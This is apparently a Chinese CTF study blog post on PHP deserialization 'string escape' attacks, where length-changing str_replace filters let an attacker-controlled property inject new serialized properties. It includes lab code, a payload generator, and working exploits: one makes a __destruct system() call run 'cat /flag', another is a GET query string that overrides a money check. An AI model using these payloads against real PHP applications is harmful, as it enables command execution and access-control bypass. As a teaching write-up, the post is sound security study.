php反序列化学习之字符串逃逸

php反序列化学习-字符串逃逸

做题遇到了字符串逃逸这个知识点，于是学习了一下并做个简单的总结，先复习一下序列化的基础知识

题型概括

这种题一般是会先对php序列化，然后对序列化后生成的字符串进行过滤，过滤非法字符，导致整体字符串长度发生变化（变长或变短），而php反序列化时是严格遵守序列化字符串的格式的，否则报错，这就造成了字符串逃逸漏洞，可以利用我们能修改的变量去修改本来不能修改的变量

本地搭建实验环境来学习

过滤后变长

实验学习

实验源码

<?php

include "func.php";
function filter_repmore($str)  //利用一个变量修改目标变量
{
    return str_replace('b','cc',$str);  //把b换成cc，过滤后序列化整体字符串变长
}

class A{
    public $name='小明';
    public $info="ctfer";
}
$test1=new A();
print_r($test1)."\n";
print_r(serialize($test1))."\n";
?>

func.php:

<?php
function get_payload($str,$num,$tar='')
{
    return str_repeat($str, $num).$tar;
}
?>

假设我们能修改name的值，info的值无法修改，如何利用name去修改info的值呢？

首先，要了解一下序列化的一些基础知识，如图：
假设有一个A类的实例化对象，用两个属性，分别是属性name，值为ben 属性info，值为ctfer

上方是一个类的实例化对象，有两个属性，下方是序列化后的字符串，{}内包含了这个对象的所有属性和对应的值，可以分为4个部分，

每个部分的组成为

s(字符串):数字(长度) :“字符串内容”; （字符串内容部分以:“开始，”;结束，这两个符号成对出现）

结尾有" ;} " 这两个符号，在反序列化过程中，遇到这两个符号就会停止反序列化，后面的字符会被丢弃

php在反序列化时，会严格按照字符串长度来读取后面的字符串,如果长度不对，就会反序列化失败，返回一个布尔变量false，我看其他大佬的文章这里都会报错，可能是php版本不同，如:

我们把原来的4改为3，php在读取时就会往后面读取3个字符：nam，然后结束这个字符串的读取**，正常来说接下来该读取结束符 “; 来构成闭合，但是没有，而是读取到了e，于是反序列化失败**，返回false，如果改为5，就会读取 name” 然后结束，也是无法闭合而失败

当然一般来说长度肯定是正确的，但是在我这个实验环境中，如果某个属性的值中含有’b’字符，经过上面的filter_repmore函数过滤后变为cc，长度就会发生改变，在反序列化时就会发生实际字符串长度大于预期长度的情况，导致无法闭合而失败，例如:

$test1=new A();
print_r($test1)."\n";
$res=serialize($test1);
print($res."\n");
print(filter_repmore(serialize($test1)))."\n";
var_dump(unserialize(filter_repmore(serialize($test1))));

这里就是读取了一个c之后，然后停止读取内容，后面就应该读取结束符来构成闭合，但这里是c不是"，因此失败，如果我们自己在name属性的值中，添加 "; 让它完成闭合，再跟上符合格式的序列化字符串，结尾跟上结束符，让php继续执行反序列化流程，似乎就可以成功了，后面的序列化字符串也是我们可以控制的，就像上面的绿框，我们把ctfer改为hacker，长度改为6，如果能让它成功反序列化，就达到了修改info的目的

开始尝试:

但是并没有像我们的预期一样构成闭合**，“; 和结束符 ;}被当成字符串的内容来读取**，因为name本身就要有值，所以就把我们的序列化字符串当做name的值，然后再去读取下一个属性来反序列化

那我们需要一点东西去填充name的值，好让php能把我们的序列化字符串去反序列化而不是当作字符串读取，这时就可以借助前面提到的过滤函数了

function filter_repmore($str)  //利用一个变量修改目标变量
{
    return str_replace('b','cc',$str);  //把b换成cc，过滤后序列化整体字符串变长
}

前面我们也分析了，每有一个b，就会多出一个c无法被当做正常字符串去读取，而是按照正常流程去反序列化下一个属性和对应的值， ";s:4:“info”;s:6:“hacker”;} 这个我们输入的序列化字符串长度为27

如果我们把name的值换成27个b+序列化字符串，27个b就会被过滤替换为54个c，而在反序列化时，由于name的长度在序列化时就确定为54（27个b+序列化字符串），php就会把前面54个c当作name的值来读取，后面的序列化字符串就会逃逸出去，正常反序列化，从而修改info，如:

<?php
include "func.php";
function filter_repmore($str)
    //利用一个变量修改目标变量
{
    return str_replace('b','cc',$str);
}
class A{
    public $name='ben';
    public $info="ctfer";
}
$test1=new A();
print_r($test1)."\n";
echo "\n".serialize($test1)."\n";
$tar='";s:4:"info";s:6:"hacker";}'; //27
$payload=get_payload('b',strlen($tar),$tar); //利用getpayload生成利用的payload
$test1->name=$payload;
print_r($test1)."\n";
print_r(serialize($test1))."\n";
$res=filter_repmore(serialize($test1));
echo "\n".$res."\n";
$c=unserialize($res);
print_r($c);
?>

可以看到，info的值被修改了

接下来以一道简单的题目来讲构造流程

题目实战

newstarctf 2024 week4 逃

可以看到，这里有个waf过滤函数，把对象序列化并过滤后再反序列化，是过滤后变长的题型

总体思路—>利用我们能控制的key去修改cmd，在__destruct中system执行cmd

具体实现:

1拿下来源码放在本地，稍作修改:

<?php
include "func.php";
//highlight_file(__FILE__);
function waf($str)
{
    return str_replace("bad", "good", $str);
}
//利用key去修改cmd  key=
class GetFlag
{
    public $key='123';
    public $cmd = "ls"; #cmd是我们要去修改的，先写死

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function __destruct()
    {
        system($this->cmd);
    }
}
echo serialize(new GetFlag());  #

这段代码就是查看正常的序列化后的字符串（其中含有我们想要的cmd值），当然如果对序列化熟悉的话可以直接构造payload

把红框部分拿下来即可

2.配合前面写的get_payload函数构造payload，并在本地尝试是否成功
bad被替换为good，一个bad可以逃逸一个字符，所以需要直接传入序列化字符串长度即可

可以看到，在本地实验成功，接下来只要修改cmd的值为其他系统命令，再修改序列化字符串中cmd的长度，然后把$payload传过去即可

最后的exp:

<?php
include "func.php";
//highlight_file(__FILE__);
function waf($str)
{
    return str_replace("bad", "good", $str);
}
//利用key去修改cmd  
class GetFlag
{
    public $key='ls';
    public $cmd = "whoami";

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function __destruct()
    {
        system($this->cmd);
    }
}
$key='";s:3:"cmd";s:9:"cat /flag";}';
$payload=get_payload('bad',strlen($key),$key);
echo "\n".$payload;
?>

把payload赋值为key即可，

结果:

过滤后变短

实验学习

<?php

include "func.php";
function filter_repless($str)
    //利用两个变量修改目标变量
{
    return str_replace('b','',$str);
}

class C{
    // name全填上会被替换的内容
    public $name='ben';
    // info填payload
    public $info="ctfer";
    public $password='123456';
}

像上面的过滤函数，把b替换为空，替换后序列化的字符串长度减少，就是过滤后变短的情况，这一种就是与变长不同，要利用两个变量（info和name）去修改两个变量（info和password）

第一步，也是要先拿到我们含有修改目标的序列化字符串,name值随意

我们的目的也是一样的，要通过";构造闭合，然后让php来反序列化我们设计好的序列化字符串，从而修改变量，尝试把info的值赋值为上面红框里的序列化字符串，那为什么不跟变长的类型一样，直接把序列化字符串跟在name的值后面呢？看下图:

如果跟在name后面，由于name的长度本身就很长，过滤后name的值变短了，我们的序列化字符串就会被读取为name的值(逃不出去)，就无法发挥它的作用了，所以要把info的值设为序列化字符串

如果要让绿框内的字符串正常反序列化，而不是被当作字符串读取，红框内的全部内容就填充进name的值中，";s:4:“info”;s:60:"长度为19，如果name的值设为19个b，经过过滤函数过滤为空后，那么php就会往下读取，把本不该读取的 “;s:4:“info”;s:60:” 读取为name的值，后面的序列化字符串就会逃逸出去，不被当作字符串来读取，而是被成功反序列化，修改info

完整实验代码:

<?php

include "func.php";
function filter_repless($str)
    //利用两个变量修改目标变量
{
    return str_replace('b','',$str);
}

class C{
    // name全填上会被替换的内容
    public $name='ben';
    // info填payload
    public $info="ctfer";
    public $password='123456';
}
$test1=new C();
echo serialize($test1)."\n";
$tar='";s:4:"info";s:6:"hacker";s:8:"password";s:10:"helloworld";}'; 
$test1->name=get_payload('b',19);  
$test1->info=$tar;                     
print_r(($test1));
$res=serialize($test1);
$r=filter_repless($res);
echo $res;
echo "\n".$r."\n";
$c=unserialize($r);
print_r($c);
?>

反序列化成功，password被修改，name具体要多少个被替换的字符，要根据题目实际来计算

题目实战

上网找了一个也是比较简单的题目的源码

<?php
show_source("index123.php");
//error_reporting(0);

function filter($str)
{
   return preg_replace('/abc|zcxx/','',$str);
}
class Login{
    public $name;
    public $pwd;
    public $money;
    public function __construct()
    {
       $this->name=$_GET['name'];
       $this->pwd=$_GET['pwd'];
       $this->money='999';

    }
}
if($_GET['name']&&$_GET['pwd']) {
    $login = new Login();
    $last = unserialize(filter(serialize($login)));
    if ($last->money < 1000) {
        echo('get more money');
    } else {
        echo file_get_contents('flag.php');
    }
}
else
{
    die("name and password can't be null");
}

?>

由源码可知，需要修改money参数>1000,才能拿到flag，name和pwd是我们可以控制的，利用name和pwd修改money，由过滤函数可知过滤后变短的题型，

1.本地拿下源码，先构造出包含（money=1001，pwd的属性和值） 的正常的序列化后的字符串，目的就是赋值给pwd，在反序列化时能够按照我们设定的来反序列化，从而修改money别忘记开头要包含 "; 来手动闭合

2.然后先把name赋值给abc，查看过滤后的序列化字符串，计算要逃逸的字符数量

如上图，我们的目的是，在反序列化时 “;s:3:“pwd”;s:46:” 时作为name的字符串内容来读取，后面的红框内容就可以逃出去，按照反序列化流程来修改money， “;s:3:“pwd”;s:46:” 长度为18，一个abc能提供3个字符逃逸，所以我们把name赋值为6个abc即可

最终exp:

<?php
include "func.php";
function filter($str)
{
    return preg_replace('/abc|zcxx/','',$str);
}
class Login{
    public $name;
    public $pwd;
    public $money;
    public function __construct()
    {
        $this->name='abc';
        $this->pwd='123';
        $this->money='1001';

    }
}
$test=new Login();
$test->pwd='";s:3:"pwd";s:3:"123";s:5:"money";s:4:"1001";}'; 
$tar='";s:3:"pwd";s:46:"'; //26
echo strlen($tar);
$test->name=get_payload('abc',6);
echo filter(serialize($test));
print_r(unserialize(filter(serialize($test))));
echo"\n".$test->name;
echo"\n".$test->pwd;
?>

在本地的环境实验后得知，money的值成功被修改，然后构造payload即可

/?name=abcabcabcabcabcabc&pwd=";s:3:"pwd";s:3:"123";s:5:"money";s:4:"1001";}

结果: